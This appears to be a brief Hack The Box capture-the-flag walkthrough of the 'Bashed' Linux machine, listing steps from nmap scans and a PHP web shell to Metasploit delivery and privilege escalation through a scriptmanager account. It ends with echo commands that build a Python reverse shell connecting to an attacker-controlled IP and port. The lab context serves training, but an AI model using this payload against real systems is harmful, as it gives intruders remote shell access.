Bashed by Hack The Box

3 Dec 2020, 8:33 p.m.

10 Feb 2022, 5:45 p.m.

03:11 minutes

Platform
Hack The Box

Operating System
Linux

Level
Easy

Machine Rating
Gubbish

Attribute	Value
Machine Platform	Hack The Box
Machine Name	Bashed
Machine Author	Arrexel
Machine Level	Easy
Machine Rating	Gubbish
Machine OS	Linux

1 Initial Nmap Scan

2 Nmap Follow Scan all HTTP Scripts

3 Apache 2.4.18 on Ubuntu

4 DEV Path

5 PHP Bash Shell

6 Enumeration

7 Create Shell

8 Host Shell

9 Web Delivery Metasploit

10 Upgrade-metasploit-meterpreter

11 Enumerate

12 Sudo -l

13 TTY Shell

14 Files-Owned-By-Scriptmanager

15 File Fun By Root

16 Spawn Shell As Scriptmanager

17 Content Discovery

18

echo 'import socket,subprocess,os' > test.py echo 's=socket.socket(socket.AF_INET,socket.SOCK_STREAM)' >> test.py echo 's.connect(("10.10.14.26",4432)) ' >> test.py echo 'os.dup2(s.fileno(),0)' >> test.py echo 'os.dup2(s.fileno(),1)' >> test.py echo 'os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);' >> test.py